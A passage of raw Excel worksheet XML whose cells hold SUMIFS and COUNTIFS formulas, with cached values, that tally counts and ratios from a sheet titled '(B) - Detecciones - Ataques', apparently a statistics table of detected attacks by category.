        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>0</v>
      </c>
      <c r="BX68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>1</v>
      </c>
      <c r="BZ68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>20</v>
      </c>
      <c r="CA68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>0</v>
      </c>
      <c r="CC68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>0</v>
      </c>
      <c r="CE68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>0</v>
      </c>
      <c r="CG68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>1</v>
      </c>
      <c r="CI68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>0</v>
      </c>
      <c r="CJ68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>8</v>
      </c>
      <c r="CL68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>3</v>
      </c>
      <c r="CN68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>1</v>
      </c>
      <c r="CP68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>23</v>
      </c>
      <c r="CQ68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>0</v>
      </c>
      <c r="CR68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>1771</v>
      </c>
      <c r="CT68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>2</v>
      </c>
      <c r="CU68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>0</v>
      </c>
      <c r="CW68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>0</v>
      </c>
      <c r="CY68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>48</v>
      </c>
      <c r="CZ68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>5</v>
      </c>
      <c r="DE68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>0</v>
      </c>
      <c r="DF68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>18</v>
      </c>
      <c r="DI68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>0</v>
      </c>
      <c r="DJ68" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>1</v>
      </c>
      <c r="DK68" s="271"/>
      <c r="DO68" s="279"/>
      <c r="DP68" s="271"/>
      <c r="DQ68" s="271"/>
      <c r="DR68" s="271"/>
      <c r="DS68" s="271"/>
      <c r="DT68" s="271"/>
      <c r="DU68" s="271"/>
      <c r="DV68" s="271"/>
      <c r="DW68" s="271"/>
      <c r="DX68" s="271"/>
      <c r="DY68" s="271"/>
      <c r="DZ68" s="271"/>
      <c r="EA68" s="271"/>
      <c r="EB68" s="271"/>
      <c r="EC68" s="271"/>
      <c r="ED68" s="280"/>
      <c r="EG68" s="279"/>
      <c r="EH68" s="271"/>
      <c r="EI68" s="271"/>
      <c r="EJ68" s="271"/>
      <c r="EK68" s="271"/>
      <c r="EL68" s="271"/>
      <c r="EM68" s="271"/>
      <c r="EN68" s="271"/>
      <c r="EO68" s="271"/>
      <c r="EP68" s="271"/>
      <c r="EQ68" s="483"/>
      <c r="ER68" s="478"/>
      <c r="ES68" s="478"/>
      <c r="ET68" s="478"/>
      <c r="EU68" s="478"/>
      <c r="EV68" s="478"/>
      <c r="EW68" s="478"/>
      <c r="EX68" s="478"/>
      <c r="EY68" s="478"/>
      <c r="EZ68" s="478"/>
      <c r="FA68" s="479"/>
      <c r="FD68" s="480"/>
      <c r="FG68" s="495" t="s">
        <v>9</v>
      </c>
      <c r="FH68" s="414">
        <v>0.3695652173913043</v>
      </c>
      <c r="FI68" s="369">
        <f>EM66</f>
        <v>0.8167938931</v>
      </c>
      <c r="FM68" s="480"/>
      <c r="FN68" s="480"/>
      <c r="FO68" s="480"/>
      <c r="FP68" s="480"/>
      <c r="FQ68" s="480"/>
      <c r="FR68" s="480"/>
      <c r="FS68" s="480"/>
      <c r="FT68" s="480"/>
      <c r="FU68" s="480"/>
      <c r="FV68" s="480"/>
      <c r="FW68" s="480"/>
      <c r="FX68" s="480"/>
      <c r="FY68" s="379" t="s">
        <v>633</v>
      </c>
      <c r="FZ68" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY51)+SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY51 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY51)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY51 &amp; "*"))</f>
        <v>0.4772727273</v>
      </c>
      <c r="GA68" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY51)+SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY51 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY51)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY51 &amp; "*"))</f>
        <v>0.5</v>
      </c>
      <c r="GB68" s="480"/>
      <c r="GC68" s="379" t="s">
        <v>633</v>
      </c>
      <c r="GD68" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY51)+SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY51 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY51)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY51 &amp; "*"))</f>
        <v>0.4545454545</v>
      </c>
      <c r="GE68" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY51)+SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY51 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY51)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY51 &amp; "*"))</f>
        <v>0.5</v>
      </c>
      <c r="GF68" s="480"/>
      <c r="GG68" s="480"/>
      <c r="GH68" s="480"/>
      <c r="GI68" s="480"/>
      <c r="GJ68" s="480"/>
      <c r="GK68" s="480"/>
      <c r="GL68" s="480"/>
      <c r="GM68" s="480"/>
      <c r="GN68" s="480"/>
      <c r="GO68" s="480"/>
      <c r="GP68" s="480"/>
      <c r="GQ68" s="480"/>
      <c r="GR68" s="480"/>
      <c r="GS68" s="480"/>
      <c r="GT68" s="480"/>
      <c r="GU68" s="480"/>
      <c r="GV68" s="480"/>
      <c r="GW68" s="480"/>
      <c r="GX68" s="480"/>
      <c r="GY68" s="480"/>
      <c r="GZ68" s="480"/>
      <c r="HA68" s="480"/>
      <c r="HB68" s="480"/>
      <c r="HC68" s="480"/>
      <c r="HD68" s="480"/>
      <c r="HE68" s="480"/>
      <c r="HF68" s="480"/>
      <c r="HG68" s="480"/>
      <c r="HH68" s="480"/>
      <c r="HI68" s="480"/>
      <c r="HJ68" s="480"/>
      <c r="HK68" s="480"/>
      <c r="HL68" s="480"/>
      <c r="HM68" s="480"/>
      <c r="HN68" s="480"/>
      <c r="HO68" s="480"/>
      <c r="HP68" s="480"/>
    </row>
    <row r="69">
      <c r="J69" s="277"/>
      <c r="K69" s="271"/>
      <c r="L69" s="271"/>
      <c r="M69" s="271"/>
      <c r="N69" s="271"/>
      <c r="O69" s="278"/>
      <c r="Q69" s="271"/>
      <c r="R69" s="352" t="s">
        <v>2536</v>
      </c>
      <c r="S69" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>34</v>
      </c>
      <c r="T69" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="U69" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>182</v>
      </c>
      <c r="V69" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>61</v>
      </c>
      <c r="W69" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>14</v>
      </c>
      <c r="X69" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="Y69" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>811</v>
      </c>
      <c r="Z69" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>159729</v>
      </c>
      <c r="AA69" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>51</v>
      </c>
      <c r="AB69" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>222</v>
      </c>
      <c r="AC69" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>51</v>
      </c>
      <c r="AD69" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>15</v>
      </c>
      <c r="AE69" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>61</v>
      </c>
      <c r="AF69" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>6008</v>
      </c>
      <c r="AG69" s="271"/>
      <c r="AH69" s="352" t="s">
        <v>2536</v>
      </c>
      <c r="AI69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>23</v>
      </c>
      <c r="AJ69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>10</v>
      </c>
      <c r="AL69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>0</v>
      </c>
      <c r="AN69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>163</v>
      </c>
      <c r="AR69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>5</v>
      </c>
      <c r="AS69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>3</v>
      </c>
      <c r="AU69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>7</v>
      </c>
      <c r="AV69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>4</v>
      </c>
      <c r="AW69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>46</v>
      </c>
      <c r="AY69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>1</v>
      </c>
      <c r="BA69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>14</v>
      </c>
      <c r="BB69" s="355">
